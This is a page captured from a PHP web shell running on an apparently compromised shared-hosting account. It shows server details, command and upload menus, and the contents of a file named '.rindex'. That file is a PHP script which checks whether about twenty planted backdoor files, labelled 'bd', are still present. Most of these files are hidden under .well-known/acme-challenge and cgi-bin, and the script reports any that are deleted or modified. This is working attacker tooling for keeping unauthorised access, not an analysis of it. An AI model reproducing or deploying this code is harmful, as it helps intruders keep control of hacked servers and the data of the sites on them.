Server IP : 109.234.165.82  /  Your IP : 216.73.216.156
Web Server : Apache
System : Linux poivre.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : section52 ( 1135)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/section52/gaipes.lasection52.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/section52/gaipes.lasection52.com/.rindex
<?php   $r = '/home2/section52/gaipes.lasection52.com'; $x = ["/.well-known/acme-challenge/diyconf.ini.php"=>"bd@@105309@@70",
"/.well-known/acme-challenge/diyconf.php"=>"bd@@105310@@1475",
"/.well-known/acme-challenge/qanda.php"=>"bd@@78719@@$_COOKIE[5",
"/.well-known/acme-challenge/qanda.php"=>"bd@@71559@@1587",
"/edit.php"=>"bd@@124551@@$_COOKIE[7",
"/.well-known/acme-challenge/sadtab_chpw.php"=>"bd@@124552@@911",
"/.well-known/acme-challenge/Products.php"=>"bd@@78750@@2405",
"/.well-known/acme-challenge/sadtab_chpw.php"=>"bd@@125118@@53",
"/.well-known/acme-challenge/diyconf.php"=>"bd@@111297@@3",
"/.well-known/acme-challenge/sadtab.php"=>"bd@@125124@@1078",
"/.well-known/acme-challenge/Products.php"=>"bd@@104700@@51",
"/cgi-bin/exception.php"=>"bd@@78687@@$_COOKIE[-",
"/.well-known/offlinebar.php"=>"bd@@78704@@32",
"/sendmail_actions.php"=>"bd@@71546@@942",
"/cgi-bin/exception.php"=>"bd@@71577@@1054",
"/cgi-bin/admin.languages.php"=>"bd@@78765@@1623",
"/.well-known/DeleteFile.php"=>"bd@@78778@@866",
"/sendmail.php"=>"bd@@78797@@916",
"/.well-known/offlinebar.php"=>"bd@@71403@@951",
"/.well-known/acme-challenge/diyconf.ini.php"=>"bd@@104701@@1088"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');